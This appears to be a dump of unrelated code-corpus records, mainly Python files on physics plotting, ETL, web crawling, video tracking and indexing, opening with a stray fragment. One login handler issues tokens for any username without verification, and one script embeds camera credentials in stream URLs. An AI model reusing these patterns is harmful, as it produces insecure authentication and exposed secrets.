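        combo = (random.randrange(2), random.choice((0.60, 0.70, 0.80)))
        if combo in seen:          # already sampled: skip, like the 'continue'
            continue
        seen.add(combo)
    assert len(seen) == 5 and draws >= 5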
print('Chi2 Func: ', expo.GetChisquare()/(expo.GetNDF()))\n\n \n\n graph_result = ROOT.TGraph()\n graph_result.SetName(f\"likelihood_{model}\")\n fit_result.Scan(1, graph_result,240, 320)\n graph_result.Write()\n\n fit_function = CORRECTED_COUNTS_BEST[model].GetFunction('myexpo')\n fit_function.SetLineColor(kOrangeC)\n fit_function.SetLineWidth(2)\n\n canvas = ROOT.TCanvas(f'ct_spectra_{model}')\n canvas.SetTopMargin(0.052)\n canvas.SetRightMargin(0.01)\n canvas.SetLeftMargin(0.13)\n\n\n canvas.SetLogy()\n\n frame = ROOT.gPad.DrawFrame(-0.5, 1, 35.5, 1000, ';#it{c}t (cm);d#it{N}/d(#it{c}t) [(cm)^{-1}]')\n\n frame.GetXaxis().SetTitleSize(0.07)\n frame.GetYaxis().SetTitleSize(0.07)\n frame.GetXaxis().SetTitleOffset(0.9)\n frame.GetYaxis().SetTitleOffset(0.9)\n\n frame.GetYaxis().SetLabelSize(0.05)\n frame.GetXaxis().SetLabelSize(0.05)\n\n pinfo = ROOT.TPaveText(0.4, 0.63, 0.88, 0.91, 'NDC')\n pinfo.SetBorderSize(0)\n pinfo.SetFillStyle(0)\n pinfo.SetTextAlign(22)\n pinfo.SetTextFont(43)\n pinfo.SetTextSize(36)\n\n strings = []\n strings.append('ALICE')\n strings.append('Pb#font[122]{-}Pb, 0-90%, #sqrt{#it{s}_{NN}} = 5.02 TeV')\n strings.append(f'#tau = {fit_function.GetParameter(1):.0f} #pm 11 (stat.) #pm 6 (syst.) ps')\n strings.append(f'Fit Probability = {fit_function.GetProb():.2f}')\n\n for s in strings:\n pinfo.AddText(s)\n\n new_expo = ROOT.TF1('new_expo2', '[0]*exp(-x/([1]*0.029979245800))/((exp(-[2]/([1]*0.029979245800)) - exp(-[3]/([1]*0.029979245800))) * [1]*0.029979245800)', 1, 35)\n new_expo.SetParameter(0, fit_function.GetParameter(0))\n new_expo.SetParameter(1, fit_function.GetParameter(1))\n new_expo.SetParameter(2, fit_function.GetParameter(2))\n new_expo.SetParameter(3, fit_function.GetParameter(3))\n new_expo.Draw('same')\n\n\n CORRECTED_COUNTS_BEST[model].Draw('ex0same')\n CORRECTED_COUNTS_BEST[model].SetMarkerStyle(20)\n CORRECTED_COUNTS_BEST[model].SetMarkerColor(kBlueC)\n CORRECTED_COUNTS_BEST[model].SetLineColor(kBlueC)\n CORRECTED_COUNTS_BEST[model].SetMinimum(0.001)\n CORRECTED_COUNTS_BEST[model].SetMaximum(1000)\n CORRECTED_COUNTS_BEST[model].SetStats(0)\n\n frame.GetYaxis().SetRangeUser(7, 2000)\n frame.GetXaxis().SetRangeUser(0.5, 35.5)\n pinfo.Draw('x0same')\n\n canvas.Write()\n\noutput_file.Close()\n\n\n# new_out = ROOT.TFile('out2.root', \"recreate\")\n# CORRECTED_COUNTS_BEST['pol1'].Write()\n# new_out.Close()","sub_path":"common/compute_lifetime.py","file_name":"compute_lifetime.py","file_ext":"py","file_size_in_byte":15934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"339864726","text":"from runtime import proRuntime as runtime\n\ndef smallestMultiple(a, b):\n num = 1\n result = 0\n j = 0\n\n while True:\n for i in range(a, b+1, 1):\n if num % i == 0:\n result = num if i == b else i\n j = i\n continue\n else:\n break\n\n num += 1\n if j == b:\n break\n\n print(result)\n\nsmallestMultiple(1, 20)\n\nruntime()\n# --- 320.50462222099304 seconds ---","sub_path":"problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"185388063","text":"from django.conf import settings\n\nfrom hcap_geo.models import Region\nfrom hcap_utils.contrib.management import BaseSeedCommand\n\nCSV_DIR = settings.BASE_DIR / \"hcap_geo\" / \"data\" / \"region\" / \"csv\"\n\n\nclass Command(BaseSeedCommand):\n CONTEXT_BRAZIL = \"brazil\"\n\n app = \"geo\"\n model = \"region\"\n\n context_choices = 
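For reference, the brute-force scan in problem5.py above (which the trailing comment clocks at ~320 s) has a closed-form counterpart: the smallest number divisible by 1..n is the running least common multiple. An alternative sketch, not taken from the source:

    from functools import reduce
    from math import gcd

    def smallest_multiple(n):
        # lcm(a, b) = a * b / gcd(a, b), folded over 1..n
        return reduce(lambda a, b: a * b // gcd(a, b), range(1, n + 1), 1)

    assert smallest_multiple(10) == 2520
    assert smallest_multiple(20) == 232792560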
(CONTEXT_BRAZIL,)\n\n def seed(self):\n if self.context == self.CONTEXT_BRAZIL:\n self.seed_brazil_data()\n else:\n self.raise_message(f'Unknown context \"{self.context}\"')\n\n def seed_brazil_data(self):\n self.seed_from_csv(CSV_DIR / \"1_world\")\n self.seed_from_csv(CSV_DIR / \"2_continents\")\n self.seed_from_csv(CSV_DIR / \"3_countries\")\n\n brazil_dir = CSV_DIR / \"3_countries/076_brazil\"\n\n self.seed_from_csv(brazil_dir / \"4_regioes\")\n self.seed_from_csv(brazil_dir / \"4_regioes_lat_lng\")\n self.seed_from_csv(brazil_dir / \"5_ufs\")\n self.seed_from_csv(brazil_dir / \"5_ufs_lat_lng\")\n self.seed_from_csv(brazil_dir / \"6_mesorregioes\")\n self.seed_from_csv(brazil_dir / \"6_microrregioes\")\n self.seed_from_csv(brazil_dir / \"7_municipios\")\n\n def fetch_model(self, row):\n kind = int(row[\"kind\"])\n parent_hierarchy = row[\"parent_hierarchy\"]\n code = row[\"code\"]\n\n try:\n region = Region.objects.get(kind=kind, parent_hierarchy=parent_hierarchy, code=code)\n except Exception:\n region = Region(kind=kind, parent_hierarchy=parent_hierarchy, code=code)\n\n name = row.get(\"name\")\n if name not in [None, \"\"]:\n region.name = name\n\n abbr = row.get(\"abbr\")\n if abbr not in [None, \"\"]:\n region.abbr = abbr\n\n lat = row.get(\"lat\")\n lng = row.get(\"lng\")\n if lat not in [None, \"\"] and lng not in [None, \"\"]:\n region.lat = lat\n region.lng = lng\n\n return region\n\n def fetch_relations(self, region, row):\n queries = row.get(\"parents\")\n\n if queries not in [None, \"\"]:\n parents = []\n\n for query in queries.split(\";\"):\n queryset = Region.objects\n\n for query_item in query.split(\"&\"):\n (kind, code) = query_item.split(\"=\")\n kind = int(kind)\n\n if isinstance(queryset, Region):\n queryset = queryset.children.get(kind=kind, code=code)\n else:\n queryset = queryset.get(kind=kind, code=code)\n\n if isinstance(queryset, Region):\n parents.append(queryset)\n else:\n self.raise_message(f'Parent \"{query}\" not found')\n\n if len(parents) > 0:\n region.parents.set(parents)\n","sub_path":"hcap_geo/management/commands/seed_base_regions.py","file_name":"seed_base_regions.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"265618217","text":"#!/usr/bin/env python\n\nimport configparser\nimport os\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import row_number\nfrom pyspark.sql.functions import (year,\n month,\n dayofmonth,\n hour,\n weekofyear,\n date_format,\n from_unixtime,\n desc)\nfrom pyspark.sql.window import Window\n\n\nconfig = configparser.ConfigParser()\nconfig.read('dl.cfg')\n\nos.environ['AWS_ACCESS_KEY_ID']=config['AWS_ACCESS_KEY_ID']\nos.environ['AWS_SECRET_ACCESS_KEY']=config['AWS_SECRET_ACCESS_KEY']\n\n\ndef create_spark_session():\n spark = SparkSession \\\n .builder \\\n .config(\"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:2.7.0\") \\\n .getOrCreate()\n return spark\n\n\ndef process_song_data(spark, input_data, output_data):\n # get filepath to song data file\n song_data = input_data + \"song_data/*/*/*/*.json\"\n\n # read song data file\n df = spark.read.json(song_data)\n\n # extract columns to create songs table\n cols = [\"song_id\", \"title\", \"artist_id\", \"year\", \"duration\"]\n songs_table = (df.filter(df.song_id.isNotNull())\n .select(cols)\n .distinct())\n\n # write songs table to parquet files partitioned by year and artist\n path = output_data + \"songs_table.parquet\"\n partition = [\"year\", 
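fetch_relations above decodes parent lookups from strings shaped like "kind=code&kind=code;..."; stripped of the ORM, the decoding step alone looks like this (example values are made up):

    def parse_parent_queries(queries):
        parsed = []
        for query in queries.split(";"):          # one parent per ';' group
            steps = []
            for item in query.split("&"):         # chained kind=code filters
                kind, code = item.split("=")
                steps.append((int(kind), code))
            parsed.append(steps)
        return parsed

    assert parse_parent_queries("1=BR&2=SP;3=076") == [[(1, "BR"), (2, "SP")], [(3, "076")]]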
\"artist_id\"]\n (songs_table.write\n .partitionBy(partition)\n .format(\"parquet\")\n .save(path))\n\n # extract columns to create artists table\n cols = [\"artist_id\", \"artist_name\", \"artist_location\", \"artist_latitude\", \"artist_longitude\"]\n artists_table = (df.filter(df.artist_id.isNotNull())\n .select(cols)\n .distinct()\n .withColumnRenamed(\"artist_name\", \"name\")\n .withColumnRenamed(\"artist_location\", \"location\")\n .withColumnRenamed(\"artist_latitude\", \"latitude\")\n .withColumnRenamed(\"artist_longitude\", \"longitude\"))\n\n\n # write artists table to parquet files\n path = output_data + \"artists_table.parquet\"\n (artists_table.write\n .format(\"parquet\")\n .save(path))\n\n\ndef process_log_data(spark, input_data, output_data):\n # get filepath to log data file\n log_data =input_data + \"log_data/*/*/*.json\"\n\n # read log data file\n df = spark.read.json(log_data)\n\n # filter by actions for song plays\n df = df.filter(df.page == \"NextSong\")\n\n # create datetime column from original timestamp column\n df = df.withColumn(\"start_time\", from_unixtime(df.ts / 1000.))\n\n # extract columns to create time table\n time_table = (df.select(\"start_time\")\n .withColumn(\"hour\", hour(df.start_time))\n .withColumn(\"dat\", dayofmonth(df.start_time))\n .withColumn(\"week\", weekofyear(df.start_time))\n .withColumn(\"month\", month(df.start_time))\n .withColumn(\"year\", year(df.start_time))\n .withColumn(\"weekday\", date_format(df.start_time, \"u\")))\n\n # write time table to parquet files partitioned by year and month\n path = output_data + \"time_table.parquet\"\n partition = [\"year\", \"month\"]\n (time_table.write\n .partitionBy(partition)\n .format(\"parquet\")\n .save(path))\n\n # extract columns to create users table\n cols = [\"userId\", \"firstName\", \"lastName\", \"gender\", \"level\"]\n window = Window.partitionBy(\"userId\").orderBy(desc(\"start_time\"))\n users_table = (df.filter(df.userId.isNotNull())\n .withColumn(\"rn\", row_number().over(window)))\n users_table = (users_table.filter(users_table.rn == 1)\n .drop(\"rn\")\n .select(cols)\n .withColumnRenamed(\"userId\", \"user_id\")\n .withColumnRenamed(\"firstName\", \"first_name\")\n .withColumnRenamed(\"lastName\", \"last_name\"))\n\n # write users table to parquet files\n path = output_data + \"users_table.parquet\"\n (users_table.write\n .format(\"parquet\")\n .save(path))\n\n # read in song data to use for songplays table\n path = output_data + \"songs_table.parquet\"\n song_df = spark.read.parquet(path)\n\n # extract columns from joined song and log datasets to create songplays table \n cols = [\"start_time\", \"userId\", \"level\", \"song_id\", \"artist_id\", \"sessionId\", \"location\", \"userAgent\"]\n cond_song = [df.song == song_df.title, df.length == song_df.duration]\n window = Window.orderBy(\"start_time\")\n songplays_table = (df.join(song_df, cond_song)\n .select(cols)\n .withColumn(\"songplay_id\", row_number().over(window))\n .withColumnRenamed(\"userId\", \"user_id\")\n .withColumnRenamed(\"sessionId\", \"session_id\")\n .withColumnRenamed(\"userAgent\", \"user_agent\")\n .withColumn(\"year\", year(df.start_time))\n .withColumn(\"month\", month(df.start_time)))\n\n # write songplays table to parquet files partitioned by year and month\n path = output_data + \"songplays_table.parquet\"\n partition = [\"year\", \"month\"]\n (songplays_table.write\n .partitionBy(partition)\n .format(\"parquet\")\n .save(path))\n\n\ndef main():\n spark = create_spark_session()\n input_data = 
\"s3a://udacity-dend/\"\n output_data = \"s3://ud-dataengineer/\"\n\n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"project4/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205637603","text":"\nfrom hercules_framework.handlers import BaseHandler, run_method_safe\nfrom hercules_framework.models.auth_user import AuthUserModel\nfrom hercules_framework.jwt.jwt_auth import JwTAuth\n\n\nclass AuthUser(BaseHandler):\n SUPPORTED_METHODS = (\"GET\",)\n @run_method_safe\n async def get(self):\n auth = AuthUserModel.from_dict(self.get_query_args())\n if auth.username is None:\n self.send_response(code=403, message='Forbidden')\n return\n self.send_response(\n data={\"token\": JwTAuth.generate_auth_token(auth.username)})\n","sub_path":"app/interface/handlers/v1/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"544807269","text":"class Car:\n \"\"\"A simple attempt to represent a car.\"\"\"\n\n def __init__(self, make, model, year):\n \"\"\"Initialize attributes to describe a car.\"\"\"\n self.make = make\n self.model = model\n self.year = year\n\n def get_descriptive_name(self):\n \"\"\"Return a neatly formatted descriptive name.\"\"\"\n long_name = f\"{self.year} {self.make} {self.model}\"\n return long_name.title()\n\nmy_new_car = Car('audi', 'a4', 2019)\nprint(my_new_car.get_descriptive_name())\n\n#at 'get_descriptive_name()' we define a method that puts a car's year, make, and model into one string neatly describing the car.\n#at 'my_new_car' we make an instance from the 'Car' class and assign it to the variable. 
Then we call 'get_descriptive_name()' to show what kind of car.\n","sub_path":"section-9/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637591735","text":"# -*- encoding: utf-8 -*-\nclass ValidatedProperty:\n def __init__(self, initial, min, max):\n self.max = max\n self.min = min\n self.initial = initial\n self.name = None\n\n def func(self):\n print('calling func of', self)\n\n def __set_name__(self, owner, name):\n self.name = '_validated_' + name\n\n def __get__(self, instance, owner):\n # print('in getter', instance, owner)\n return getattr(instance, self.name, self.initial)\n\n def __set__(self, instance, value):\n # print('in setter', instance, value)\n if value <= self.max and value >= self.min:\n setattr(instance, self.name, value)\n\n def __delete__(self, instance):\n print('in deleter', instance)\n if hasattr(instance, self.name):\n delattr(instance, self.name)\n\n\nclass A:\n a = ValidatedProperty(0, min=0, max=10)\n b = ValidatedProperty(0, min=-10, max=0)\n\n\na = A()\nprint('initial values: a =', a.a, ', b =', a.b)\n\na.a = 5\na.b = -5\nprint('after valid value settings: a =', a.a, ', b =', a.b)\n\na.a = 50\na.b = 100\nprint('after invalid value settings: a =', a.a, ', b =', a.b)\n\n# print(dir(a))\n\ndel a.a\ndel a.b\nprint('after delete / resetting: a =', a.a, ', b =', a.b)\n\n# a.a.func()\n# A.a.func()\nA.__dict__['a'].func()\nA.__dict__['b'].func()\n","sub_path":"06-controlled-properties/04-descriptor-validator.py","file_name":"04-descriptor-validator.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"582359021","text":"#!/usr/bin/env python\n\nfrom Sensors import Sensors\nfrom random import randint\n# calss for all the distance sensors\nclass Distance_sensors(Sensors):\n def __init__(self, io):\n\n Sensors.__init__(self, io)\n\n # Collision to the left IR\n self.LeftIRcollision = (0, 0)\n\n # Collision to the right IR\n self.RightIRcollision = (0, 0)\n\n # Collision to the Sonar\n self.SonarCollison = (0, 0)\n\n # Thresholds of its sensor\n self.left_IR_limit = 414 # 15 #480\n self.right_IR_limit = 414\n self.sonar_limit = 22 # 22\n self.turn = 1\n\n # Transform IR measurements to distance\n def from_IR_readings_2_distance(self, SensorValue):\n if SensorValue == 20.0:\n distance = 0.0\n else:\n distance = 4800.0 / (SensorValue - 20.0)\n return distance\n # set the limits of the sensors and the directions\n\n def update_direction(self):\n\n # left_distance = 100\n # right_distance = 100\n\n # left_distance = self.from_IR_readings_2_distance(self.analogs_sensors[0])\n # right_distance = self.from_IR_readings_2_distance(self.analogs_sensors[7])\n\n # self.LeftIRcollision = (0,-1) if left_distance <= self.left_IR_limit else (0,0)\n # self.RightIRcollision = (0,1) if right_distance <= self.right_IR_limit else (0,0)\n # self.SonarCollision = (-1,0) if self.analogs_sensors[6] <= self.sonar_limit else (0,0)\n\n self.LeftIRcollision = (0, -1) if self.analogs_sensors[0] >= self.left_IR_limit else (0, 0)\n self.RightIRcollision = (0, 1) if self.analogs_sensors[7] >= self.right_IR_limit else (0, 0)\n random = randint(0, 10)\n if random >= 5:\n self.SonarCollision = (-1, self.turn) if self.analogs_sensors[6] <= self.sonar_limit else (0, 0)\n else:\n self.SonarCollision = (-1, self.turn) if self.analogs_sensors[6] <= self.sonar_limit else (0, 0)\n 
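The ValidatedProperty descriptor above silently drops out-of-range writes. A compact variant of the same descriptor protocol (__set_name__/__get__/__set__) that clamps instead, offered only as an illustration:

    class Clamped:
        def __init__(self, lo, hi):
            self.lo, self.hi = lo, hi

        def __set_name__(self, owner, name):
            self.attr = '_' + name      # per-instance storage slot

        def __get__(self, obj, owner):
            if obj is None:
                return self
            return getattr(obj, self.attr, self.lo)

        def __set__(self, obj, value):
            setattr(obj, self.attr, min(self.hi, max(self.lo, value)))

    class Gauge:
        level = Clamped(0, 10)

    g = Gauge()
    g.level = 50
    assert g.level == 10   # clamped rather than ignored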
################################# (-1,-1)!! changed\n\n # provide the overall direction out of the distance sensor\t\n def return_direction_IR_Sonar_Sensors(self):\n\n self.update_analog_sensors_meas()\n\n self.update_direction()\n\n # Adding coordinates\n # (1,2) + (10,10) + (20,20) = (31,32)\n return tuple(map(sum, zip(self.LeftIRcollision, self.RightIRcollision, self.SonarCollision)))\n","sub_path":"sensing/Distance_sensors.py","file_name":"Distance_sensors.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38485259","text":"print(\"*****Compute the Hypotenuse*****\")\r\n\r\n# import math module for square root\r\nimport math\r\n\r\n# define function named triangle with parameters sideOne and sideTwo\r\ndef triangle(sideOne, sideTwo):\r\n\r\n # calculate the hypotenuse using pythagorean theorem\r\n hypotenuse = math.sqrt(sideOne * sideOne + sideTwo * sideTwo)\r\n\r\n # return the hypotenuse\r\n return hypotenuse\r\n\r\n# ask the user to input the two side lengths of the right triangle\r\nsideOne = int(input(\"enter side a: \"))\r\nsideTwo = int(input(\"enter side b: \"))\r\n\r\n# invoke the function and set it as h\r\nh = triangle(sideOne, sideTwo)\r\nprint(f\"the hypotenuse is: {h:.2f}\")\r\n","sub_path":"hypotensue.py","file_name":"hypotensue.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442940603","text":"import logging\nimport sys\nfrom ..proxy import proxy\nimport threading\nimport arrow\nfrom db import Session\nfrom ..models.comment import Comment\nfrom ..models.content import Content\nfrom time import time\nfrom sentry import ravenClient\n\ndef requestComments(contentId, pageNumber = 1, pageSize = 50):\n params = {\n 'isNeedAllCount': 'true',\n 'isReaderOnlyUpUser': 'false',\n 'isAscOrder': 'false',\n 'contentId': contentId,\n 'currentPage': pageNumber,\n 'pageSize': pageSize,\n }\n return proxy.get(\n 'http://www.acfun.cn/comment_list_json.aspx',\n params = params,\n Referer = \"http://www.acfun.cn/a/ac{}\".format(contentId)\n )\n\ndef getCommentDictFromRes(res):\n data = res.json().get('data')\n commentIdList = data.get('commentList')\n return data.get('commentContentArr')\n\ndef getCommentsByOrder(contentId, crawlAll):\n \"\"\"根据content ID抓取评论\n Args:\n contentId: content ID\n crawlAll: 是否抓取此内容的所有评论, 如果是False, 那么只抓取前200个\n\n Returns: commentList\n \"\"\"\n res = requestComments(contentId)\n if res.status_code != 200:\n ravenClient.captureMessage('Comment Request Error', extra= { 'res': res, 'statusCode': res.status_code, 'text': res.text })\n totalPage = 1\n commentDict = {}\n else:\n totalPage = res.json().get('data').get('totalPage')\n commentDict = getCommentDictFromRes(res)\n\n if crawlAll is True:\n for pageNumber in range(1, int(totalPage)):\n newCommentDict = getCommentDictFromRes(requestComments(contentId, pageNumber + 1))\n commentDict.update(newCommentDict)\n\n return commentDict.values()\n\n\ndef formatCommentToModel(comment, contentId):\n return {\n 'id': comment.get('cid'),\n 'content': comment.get('content'),\n 'userId': comment.get('userID'),\n 'postDate': comment.get('postDate'),\n 'quoteId': comment.get('quoteId'),\n 'isDelete': comment.get('isDelete'),\n 'isUpDelete': comment.get('isUpDelete'),\n 'contentId': contentId,\n }\n\ndef fromatComments(comments, contentId):\n return [formatCommentToModel(comment, contentId) for comment in comments]\n\ndef 
saveComments(comments):\n session = Session()\n commentIds = { comment['id'] for comment in comments }\n commentsInDB = session.query(Comment.id).filter(Comment.id.in_(commentIds)).all()\n commentIdsInDB = { comment.id for comment in commentsInDB }\n if commentIdsInDB is None:\n commentIdsInDB = []\n commentIdsInDB = set(commentIdsInDB)\n\n # 添加新的评论\n needAddCommentIds = commentIds - commentIdsInDB\n needAddComments = list(filter(lambda c: c['id'] in needAddCommentIds, comments))\n session.add_all([ Comment(**comment) for comment in needAddComments])\n session.commit()\n\n #更新旧的评论\n needUpdateComments = list(filter(lambda c: c['id'] in commentIdsInDB and (c['isDelete'] is True or c['isUpDelete'] is True), comments))\n for comment in needUpdateComments:\n session.query(Comment).filter(Comment.id == comment.get('id')).update({\n 'isDelete': comment.get('isDelete'),\n 'isUpDelete': comment.get('isUpDelete')\n })\n session.commit()\n\n session.close()\n\n\ndef crawlCommentsByContentId(contentId, crawlAll):\n start = time()\n startGetTime = time()\n\n comments = getCommentsByOrder(contentId, crawlAll)\n timeOfGet = time() - startGetTime\n\n startSaveTime = time()\n comments = fromatComments(comments, contentId)\n saveComments(comments)\n timeOfSave = time() - startSaveTime\n\n timeOfTotal = time() - start\n # logging.info(\n # '抓取内容:' + str(contentId) + '评论' +\n # '[一共花费' + str(timeOfTotal) + ' 秒]' +\n # '[请求数据花费' + str(timeOfGet) +'秒]' +\n # '[处理并保存数据花费' + str(timeOfSave) +'秒]'\n # )\n\ndef crawlCommentsByContentIds(contentIds, crawlAll):\n for contentId in contentIds:\n crawlCommentsByContentId(contentId, crawlAll)\n\ndef crawlLatestComments(day, useThread = True, threadCrawlNum = 30, crawlAll = False):\n start = time()\n session = Session()\n contents = session.query(Content.id).filter(Content.publishedAt >= arrow.now().shift(days= -day).format('YYYY-MM-DD HH:MM:SS')).all()\n contentIds = [ c.id for c in contents ]\n if useThread:\n threadList = []\n for i in range(0, len(contentIds) + 1, threadCrawlNum):\n t = threading.Thread(target = crawlCommentsByContentIds, args = (contentIds[i:i+threadCrawlNum], crawlAll))\n t.start()\n threadList.append(t)\n\n for t in threadList:\n t.join()\n else:\n crawlCommentsByContentIds(contentIds, crawlAll)\n logging.info('此次一共抓取' + str(len(contentIds)) + '个内容的评论,共使用:' + str(time() - start) + '秒')\n","sub_path":"server/spiders/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359164950","text":"import cv2\nprint(cv2.__version__)\nfrom threading import Thread\nfrom people import Tracking\nimport copy\nimport time\nframes = []\n\ndef readframes_(caps):\n global frames\n ind = 0\n while True:\n t1 = time.time()\n cam_no = ind%3\n ind += 1\n for i, cap in enumerate(caps):\n cap.grab()\n t2 = time.time()\n print('grab time is: ', t2-t1)\n\n if cam_no < len(caps):\n ret, frame = caps[cam_no].retrieve()\n frames.append((frame, cam_no))\n print(\"frames len: {}, cap camera {}, time: {}\".format(len(frames), cam_no, time.time()))\n t3 = time.time()\n print('read time is:', t3-t2)\n else:\n #time.sleep(0.03)\n pass\n\n\ndef readframes(caps):\n global frames\n i = -1\n while True:\n i += 1\n for ind, cap in enumerate(caps):\n ret, frame = cap.read()\n if ret:\n if i % 10 == 0:\n frames.append((frame, ind))\n\n print(\"frames len: {} cap is {} time is {}\".format(len(frames), ind, time.time()))\n else:\n print('cap {} ret is 
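saveComments above splits crawled comment ids into inserts and updates with set arithmetic; the core of that bookkeeping in isolation (toy ids, not real data):

    crawled = {"c1": {"isDelete": False}, "c2": {"isDelete": True}, "c3": {"isDelete": False}}
    ids_in_db = {"c2"}

    need_add = set(crawled) - ids_in_db                 # brand-new comments
    need_update = {cid for cid in set(crawled) & ids_in_db
                   if crawled[cid]["isDelete"]}         # existing, now deleted

    assert need_add == {"c1", "c3"}
    assert need_update == {"c2"}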
False'.format(ind))\n\n\ndef main():\n area = [500, 1000, 400, 1200]\n\n urls = [#\"rtsp://admin:wsy001@192.168.10.8:554/cam/realmonitor?channel=1&subtype=0 \",\n #\"rtsp://admin:wsy001@192.168.10.8:554/cam/realmonitor?channel=2&subtype=0 \",\n \"rtsp://admin:wsy001@192.168.10.8:554/cam/realmonitor?channel=3&subtype=0 \",\n #\"rtsp://admin:wsy001@192.168.10.8:554/cam/realmonitor?channel=4&subtype=0 \"\n ]\n\n caps = []\n for url in urls:\n caps.append(cv2.VideoCapture(url))\n\n for i, cap in enumerate(caps):\n if not cap.isOpened():\n print(\"camera not opened\")\n \n featmodel = 'model_data/mars-small128.pb'\n tracking = Tracking(featmodel, len(urls), 2)\n im = cv2.imread('first.jpg')\n #for i in range(len(urls)):\n result = tracking.tracking_people(im, len(urls), [])\n \n thread = Thread(target=readframes_, args=(caps, ))\n thread.setDaemon(True)\n thread.start()\n\n while True:\n if frames != []:\n starttime = time.time()\n frame = frames[0]\n print('process:', frame[1])\n print('image shape: ',frame[0].shape)\n #crop_image = frame[0][area[0]:area[1],area[2]:area[3],:]\n result = tracking.tracking_people(frame[0], frame[1], area)\n #result = frame[0]\n windowname = str(frame[1])\n #cv2.imwrite('result.jpg', result)\n cv2.imshow(windowname, result)\n frames.remove(frames[0])\n endtime = time.time()\n print('tracking time is: ', endtime - starttime)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"tracking_old.py","file_name":"tracking_old.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275102135","text":"# Stanford: Tokens: 25 000 000 et taukke 400 000\nimport re,math, os, collections,sys,time\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom multiprocessing import Manager, Pool\n\n\nclass corpus_cs276:\n\n def __init__(self,nbr_of_folders):\n self.nbr_of_folders=nbr_of_folders\n self.tokens,self.dic_docs,self.dic_termes = self.traitement_corpus() #C'est un grand tableau de tuples (term_id,doc_id)\n self.length_tokens = len(self.tokens)\n self.vocabulary = collections.Counter(x[0] for x in self.tokens)\n self.length_voc = len(self.vocabulary)\n\n def traitement_corpus(self):\n \"\"\"\n Cette fonction renvoie:\n - une liste de tuples (word_id,doc_id)\n - Le dictionnaire matchant word a word_id\n - Le dictonnaire matchant doc a doc_id\n \"\"\"\n j=0\n k=0\n content_parsed = []\n dic_docs={}\n dic_termes={}\n for i in range (0,self.nbr_of_folders):\n for file_name in os.listdir('data/cs276/'+str(i)):\n with open('data/cs276/'+str(i)+'/'+file_name,'r') as f:\n doc_id = j\n dic_docs[file_name]=doc_id\n j=j+1\n content = f.read()\n words = word_tokenize(content)\n for w in words:\n if w not in dic_termes:\n w_id = k\n dic_termes[w]=w_id\n k=k+1\n content_parsed.append((w_id,doc_id))\n return content_parsed,dic_docs,dic_termes\n\n\n def map(self,partition):\n \"\"\"\n Fonction map qui ajoute a un dictionnaire dont les clefs sont les mots des elements du type (Doc_id,1)\n\n \"\"\"\n map_index={}\n for word in partition:\n if word[0] not in map_index:\n map_index[word[0]]=[]\n map_index[word[0]].append((word[1],1))\n return map_index\n\n\n def reduce(self,partition,index_inv_final):\n \"\"\"\n La fonction reduce renvoie un dictionnaire dont les clefs sont les mots.\n Les valeurs sont elles memes des dictonnaires dont les clefs sont les doc_id et les valeurs le nombre d'apparition\n \"\"\"\n for word in partition:\n if word not in 
index_inv_final:\n index_inv_final[word]={}\n for elem in partition[word]:\n doc_id=elem[0]\n cnt = elem[1]\n if doc_id in index_inv_final[word]:\n index_inv_final[word][doc_id]=index_inv_final[word][doc_id]+cnt\n else:\n index_inv_final[word][doc_id]=cnt\n return index_inv_final\n\n def shuffle(self):\n \"\"\"\n Create three different clusters of tokens\n \"\"\"\n partition={}\n partition[1]=[]\n partition[2]=[]\n partition[3]=[]\n for w in self.tokens:\n if w[0]%3==0:\n partition[1].append(w)\n elif w[0]%3==1:\n partition[2].append(w)\n elif w[0]%3==2:\n partition[3].append(w)\n return partition\n\n def map_reduce_index(self):\n \"\"\"\n On commence par regrouper les tokens dans les clusters suivants par ordre alphabetique:\n \"\"\"\n index_inv={}\n partition=self.shuffle()\n # On applique la fonction map sur chacun des clusters\n for part in partition:\n index_inv[part]=self.map(partition[part])\n # On applique la fonction reduce aux clusters et on fait grossir notre index inverse finale\n index_inv_final={}\n for part in index_inv:\n index_inv_final=self.reduce(index_inv[part],index_inv_final)\n return index_inv_final\n","sub_path":"lib/utils_cs276.py","file_name":"utils_cs276.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"649627720","text":"from pprint import pprint\n\n\n# Definition for a binary tree node\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n#\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param head, a list node\n # @return a tree node\n def sortedListToBST(self, head):\n if head == 